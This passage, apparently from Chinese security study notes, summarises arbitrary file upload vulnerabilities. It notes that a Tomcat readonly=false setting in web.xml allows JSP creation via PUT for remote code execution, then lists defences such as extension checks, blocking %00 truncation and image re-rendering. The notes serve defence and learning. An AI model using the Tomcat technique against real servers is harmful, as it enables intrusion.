on任意上传文件漏洞1.tomcat：修改/conf/web.xml中的readonly=false就可以用put方式创建jsp文件进行远程代码执行漏洞防御总结限制上传文件类型 扩展名检测防止%00截断以及特殊字符绕过，对上传的图片文件进行2次渲染压缩 限制上传文件大小：配置web server 允许最大的post大小 将上传目录设置为静态资源目录，防止被解析为脚本 使用代理页面隐藏真是路径